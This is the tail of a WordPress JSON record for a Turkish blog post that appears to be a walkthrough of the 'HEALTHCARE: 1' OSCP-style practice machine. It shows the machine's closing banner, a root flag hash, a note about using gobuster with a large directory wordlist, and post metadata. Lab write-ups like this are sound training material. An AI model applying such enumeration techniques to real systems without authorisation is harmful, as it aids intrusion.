\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001     \u2001\u2001\u2001  \u2001\u2001\u2001\u2001\u2001\u2001  \u2001\u2001\u2001\u2001\u2001\u2001  \u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001 \u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001  \u2001\u2001\u2001\u2001\u2001\u2001\n\nThanks for Playing!\n\nFollow me at: http:\/\/v1n1v131r4.com\n\nroot hash: eaff25eaa9ffc8b62e3dfebf70e83a7b\n<\/code><\/pre>\n<p>Eski m\u00fcfredata uygun bir OSCP makinas\u0131 gibi... Makinenin bana aktt\u0131\u011f\u0131 \u015fey gobuster taramalar\u0131nda <strong>directory-list-2.3-big.txt<\/strong> kullanmak.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: Level: Intermediate Description:This machine was developed to train the student to think according to the OSCP methodology. Pay attention to each&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/30\/healthcare-1\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">HEALTHCARE: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1281","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1281"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1281\/revisions"}],"predecessor-version":[{"id":1282,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1281\/revisions\/1282"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}